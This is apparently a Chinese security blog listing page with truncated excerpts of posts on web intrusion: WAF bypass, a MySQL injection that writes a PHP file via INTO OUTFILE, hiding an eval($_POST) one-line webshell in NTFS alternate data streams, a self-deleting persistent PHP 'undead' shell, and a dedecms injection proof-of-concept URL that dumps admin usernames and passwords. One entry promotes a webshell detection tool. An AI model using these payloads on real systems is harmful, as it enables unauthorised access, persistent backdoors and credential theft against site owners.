过狗过云锁一句话

thum-4a471512647354.jpg

mysql注入写文件

1.select * from admin where id =-1 union select 1,'<?php phpinfo();?>',3,4 into outfile 'c:\\1.php' 2.select * from admin where id&nb

利用ADS隐藏webshell

0X01 前言  未知攻,焉知防,在web端如何做手脚维护自己拿到的权限呢?首先要面临的是webshell查杀,那么通过利用ADS隐藏webshell,不失为一个好办法。0X02 利用ADS隐藏webshell  关于ADS的介绍,就不再阐述,详见尾部参考资料。  PHP 一句话木马:<?php @eval($_POST['chopper']);?>,当然也可以直接制作免杀PHP一句话,毕竟PHP千变万化,从变量,数组,赋值,运算,函数等,各种变种。。。 

php不死shell

<?php       set_time_limit(0);       ignore_user_abort(1);       unlink(__FILE__);       while(1){     &nbs

waf bypass

工作原因对某站进行渗透,同样是工作原因我不能描述太细致,所以很怂的我只能靠语言文字来描述一下整个思路,再附上这次bypass的马遇到的防火墙是一个没怎么见过的种类,大致fuzz了一下,规则有:1. 检测内容,如果有<, >, _GET, _POST, _REQUEST, phpinfo()等函数直接ban掉2. 检测行为,如果对上传的页面以GET或POST方式传递数据,直接ban掉通过注入找到一个可用的用户以后(没管理),发现一个上传点。在试图上传php时发现,会对里面的内容进行检测

php不死马

在别人服务器上dump下了这个文件,分析了一下,是一个挺有意思的不死马,分析以后跟大家分享一下所以这算原创还是转载…毕竟不是我写的马 有啥不合适的我再改(这个不死马的主体是这个文件,不妨叫Trojan.php<?php @unlink($_SERVER['SCRIPT_FILENAME']); //删除自身 error_reporting(0); //禁用错误报告 ignore_user_abort(true); //忽略与用户的断开,用户浏览

乌云引擎2.1

乌云已经关闭,但是上面有很多有用的帖子,历史漏洞,大家可以通过此工具来查看乌云历史提交。此工具仅用于学习交流。软件名:[箫启灵]乌云引擎版本:2.0运行环境:.NET4.5   系统W7以上。软件功能:搜索乌云历史漏洞。检测自身站点,提高自身站点防御。软件界面与功能截图:   下载地址:https://pan.baidu.com/s/1hsCCGJU

phpcms v9前台getshell

看到到处都是这个漏洞的利用.加班完这个点看看触发点.主要的问题是phpcms\modules\member\index.php 130行到140行//附表信息验证 通过模型获取会员信息if($member_setting['choosemodel']) {    require_once CACHE_MODEL_PATH.'member_input.class.php';    req

dedecms最新注入和getshell漏洞利用

条件利用:1.漏洞代码在/plus/advancedsearch.php 文件中2.php.ini要开启session.auto_start = 13.必须知道一个存在的mid,需要后台有添加自定义搜索模型爆账号密码poc:http://localhost/dedecms/plus/advancedsearch.php?mid=1&_SESSION[123]=select concat(0x7c,userid,0x7c,pwd,0x7c) as aid from `%23@__admin

一款好用的php webshell检测工具

PHP-malware-finder 是一款优秀的检测webshell和恶意软件混淆代码的工具,比如以下组件都可以被检测发现。Best PHP ObfuscatorCarbylamineCipher DesignCyklodevJoes Web Tools ObfuscatorP.A.SPHP JiamiPhp Obfuscator EncodeSpinObfWeevely3atomikucobra obfuscatorphpencodetenncweb-malware-collectionwe